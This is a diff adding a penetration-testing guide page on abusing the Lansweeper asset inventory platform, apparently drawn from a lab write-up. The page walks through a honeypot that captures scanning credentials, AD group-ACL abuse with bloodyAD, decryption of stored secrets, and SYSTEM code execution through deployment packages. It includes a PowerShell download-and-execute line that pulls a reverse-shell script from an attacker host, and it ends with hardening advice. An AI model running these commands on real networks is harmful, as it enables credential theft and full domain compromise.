|
| 1 | +# Lansweeper Abuse: Credential Harvesting, Secrets Decryption, and Deployment RCE |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +Lansweeper is an IT asset discovery and inventory platform commonly deployed on Windows and integrated with Active Directory. Credentials configured in Lansweeper are used by its scanning engines to authenticate to assets over protocols like SSH, SMB/WMI and WinRM. Misconfigurations frequently allow: |
| 6 | + |
| 7 | +- Credential interception by redirecting a scanning target to an attacker-controlled host (honeypot) |
| 8 | +- Abuse of AD ACLs exposed by Lansweeper-related groups to gain remote access |
| 9 | +- On-host decryption of Lansweeper-configured secrets (connection strings and stored scanning credentials) |
| 10 | +- Code execution on managed endpoints via the Deployment feature (often running as SYSTEM) |
| 11 | + |
| 12 | +This page summarizes practical attacker workflows and commands to abuse these behaviors during engagements. |
| 13 | + |
| 14 | +## 1) Harvest scanning credentials via honeypot (SSH example) |
| 15 | + |
| 16 | +Idea: create a Scanning Target that points to your host and map existing Scanning Credentials to it. When the scan runs, Lansweeper will attempt to authenticate with those credentials, and your honeypot will capture them. |
| 17 | + |
| 18 | +Steps overview (web UI): |
| 19 | +- Scanning → Scanning Targets → Add Scanning Target |
| 20 | + - Type: IP Range (or Single IP) = your VPN IP |
| 21 | + - Configure SSH port to something reachable (e.g., 2022 if 22 is blocked) |
| 22 | + - Disable schedule and plan to trigger manually |
| 23 | +- Scanning → Scanning Credentials → ensure Linux/SSH creds exist; map them to the new target (enable all as needed) |
| 24 | +- Click “Scan now” on the target |
| 25 | +- Run an SSH honeypot and retrieve the attempted username/password |
| 26 | + |
| 27 | +Example with sshesame: |
| 28 | + |
| 29 | +```yaml |
| 30 | +# sshesame.conf |
| 31 | +server: |
| 32 | + listen_address: 10.10.14.79:2022 |
| 33 | +``` |
| 34 | +
|
| 35 | +```bash |
| 36 | +# Install and run |
| 37 | +sudo apt install -y sshesame |
| 38 | +sshesame --config sshesame.conf |
| 39 | +# Expect client banner similar to RebexSSH and cleartext creds |
| 40 | +# authentication for user "svc_inventory_lnx" with password "<password>" accepted |
| 41 | +# connection with client version "SSH-2.0-RebexSSH_5.0.x" established |
| 42 | +``` |
| 43 | + |
| 44 | +Validate captured creds against DC services: |
| 45 | + |
| 46 | +```bash |
| 47 | +# SMB/LDAP/WinRM checks (NetExec) |
| 48 | +netexec smb inventory.sweep.vl -u svc_inventory_lnx -p '<password>' |
| 49 | +netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' |
| 50 | +netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>' |
| 51 | +``` |
| 52 | + |
| 53 | +Notes |
| 54 | +- Works similarly for other protocols when you can coerce the scanner to your listener (SMB/WinRM honeypots, etc.). SSH is often the simplest. |
| 55 | +- Many scanners identify themselves with distinct client banners (e.g., RebexSSH) and will attempt benign commands (uname, whoami, etc.). |
| 56 | + |
| 57 | +## 2) AD ACL abuse: gain remote access by adding yourself to an app-admin group |
| 58 | + |
| 59 | +Use BloodHound to enumerate effective rights from the compromised account. A common finding is a scanner- or app-specific group (e.g., “Lansweeper Discovery”) holding GenericAll over a privileged group (e.g., “Lansweeper Admins”). If the privileged group is also member of “Remote Management Users”, WinRM becomes available once we add ourselves. |
| 60 | + |
| 61 | +Collection examples: |
| 62 | + |
| 63 | +```bash |
| 64 | +# NetExec collection with LDAP |
| 65 | +netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhound -c All --dns-server <DC_IP> |
| 66 | + |
| 67 | +# RustHound-CE collection (zip for BH CE import) |
| 68 | +rusthound-ce --domain sweep.vl -u svc_inventory_lnx -p '<password>' -c All --zip |
| 69 | +``` |
| 70 | + |
| 71 | +Exploit GenericAll on group with BloodyAD (Linux): |
| 72 | + |
| 73 | +```bash |
| 74 | +# Add our user into the target group |
| 75 | +bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '<password>' \ |
| 76 | + add groupMember "Lansweeper Admins" svc_inventory_lnx |
| 77 | + |
| 78 | +# Confirm WinRM access if the group grants it |
| 79 | +netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>' |
| 80 | +``` |
| 81 | + |
| 82 | +Then get an interactive shell: |
| 83 | + |
| 84 | +```bash |
| 85 | +evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '<password>' |
| 86 | +``` |
| 87 | + |
| 88 | +Tip: Kerberos operations are time-sensitive. If you hit KRB_AP_ERR_SKEW, sync to the DC first: |
| 89 | + |
| 90 | +```bash |
| 91 | +sudo ntpdate <dc-fqdn-or-ip> # or rdate -n <dc-ip> |
| 92 | +``` |
| 93 | + |
| 94 | +## 3) Decrypt Lansweeper-configured secrets on the host |
| 95 | + |
| 96 | +On the Lansweeper server, the ASP.NET site typically stores an encrypted connection string and a symmetric key used by the application. With appropriate local access, you can decrypt the DB connection string and then extract stored scanning credentials. |
| 97 | + |
| 98 | +Typical locations: |
| 99 | +- Web config: `C:\Program Files (x86)\Lansweeper\Website\web.config` |
| 100 | + - `<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">` … `<EncryptedData>…` |
| 101 | +- Application key: `C:\Program Files (x86)\Lansweeper\Key\Encryption.txt` |
| 102 | + |
| 103 | +Use SharpLansweeperDecrypt to automate decryption and dumping of stored creds: |
| 104 | + |
| 105 | +```powershell |
| 106 | +# From a WinRM session or interactive shell on the Lansweeper host |
| 107 | +# PowerShell variant |
| 108 | +Upload-File .\LansweeperDecrypt.ps1 C:\ProgramData\LansweeperDecrypt.ps1 # depending on your shell |
| 109 | +powershell -ExecutionPolicy Bypass -File C:\ProgramData\LansweeperDecrypt.ps1 |
| 110 | +# Tool will: |
| 111 | +# - Decrypt connectionStrings from web.config |
| 112 | +# - Connect to Lansweeper DB |
| 113 | +# - Decrypt stored scanning credentials and print them in cleartext |
| 114 | +``` |
| 115 | + |
| 116 | +Expected output includes DB connection details and plaintext scanning credentials such as Windows and Linux accounts used across the estate. These often have elevated local rights on domain hosts: |
| 117 | + |
| 118 | +```text |
| 119 | +Inventory Windows SWEEP\svc_inventory_win <StrongPassword!> |
| 120 | +Inventory Linux svc_inventory_lnx <StrongPassword!> |
| 121 | +``` |
| 122 | + |
| 123 | +Use recovered Windows scanning creds for privileged access: |
| 124 | + |
| 125 | +```bash |
| 126 | +netexec winrm inventory.sweep.vl -u svc_inventory_win -p '<StrongPassword!>' |
| 127 | +# Typically local admin on the Lansweeper-managed host; often Administrators on DCs/servers |
| 128 | +``` |
| 129 | + |
| 130 | +## 4) Lansweeper Deployment → SYSTEM RCE |
| 131 | + |
| 132 | +As a member of “Lansweeper Admins”, the web UI exposes Deployment and Configuration. Under Deployment → Deployment packages, you can create packages that run arbitrary commands on targeted assets. Execution is performed by the Lansweeper service with high privilege, yielding code execution as NT AUTHORITY\SYSTEM on the selected host. |
| 133 | + |
| 134 | +High-level steps: |
| 135 | +- Create a new Deployment package that runs a PowerShell or cmd one-liner (reverse shell, add-user, etc.). |
| 136 | +- Target the desired asset (e.g., the DC/host where Lansweeper runs) and click Deploy/Run now. |
| 137 | +- Catch your shell as SYSTEM. |
| 138 | + |
| 139 | +Example payloads (PowerShell): |
| 140 | + |
| 141 | +```powershell |
| 142 | +# Simple test |
| 143 | +powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt" |
| 144 | +
|
| 145 | +# Reverse shell example (adapt to your listener) |
| 146 | +powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rs.ps1')" |
| 147 | +``` |
| 148 | + |
| 149 | +OPSEC |
| 150 | +- Deployment actions are noisy and leave logs in Lansweeper and Windows event logs. Use judiciously. |
| 151 | + |
| 152 | +## Detection and hardening |
| 153 | + |
| 154 | +- Restrict or remove anonymous SMB enumerations. Monitor for RID cycling and anomalous access to Lansweeper shares. |
| 155 | +- Egress controls: block or tightly restrict outbound SSH/SMB/WinRM from scanner hosts. Alert on non-standard ports (e.g., 2022) and unusual client banners like Rebex. |
| 156 | +- Protect `Website\\web.config` and `Key\\Encryption.txt`. Externalize secrets into a vault and rotate on exposure. Consider service accounts with minimal privileges and gMSA where viable. |
| 157 | +- AD monitoring: alert on changes to Lansweeper-related groups (e.g., “Lansweeper Admins”, “Remote Management Users”) and on ACL changes granting GenericAll/Write membership on privileged groups. |
| 158 | +- Audit Deployment package creations/changes/executions; alert on packages spawning cmd.exe/powershell.exe or unexpected outbound connections. |
| 159 | + |
| 160 | +## Related topics |
| 161 | +- SMB/LSA/SAMR enumeration and RID cycling |
| 162 | +- Kerberos password spraying and clock skew considerations |
| 163 | +- BloodHound path analysis of application-admin groups |
| 164 | +- WinRM usage and lateral movement |
| 165 | + |
| 166 | +## References |
| 167 | +- [HTB: Sweep — Abusing Lansweeper Scanning, AD ACLs, and Secrets to Own a DC (0xdf)](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) |
| 168 | +- [sshesame (SSH honeypot)](https://github.com/jaksi/sshesame) |
| 169 | +- [SharpLansweeperDecrypt](https://github.com/Yeeb1/SharpLansweeperDecrypt) |
| 170 | +- [BloodyAD](https://github.com/CravateRouge/bloodyAD) |
| 171 | +- [BloodHound CE](https://github.com/SpecterOps/BloodHound) |
| 172 | + |
| 173 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments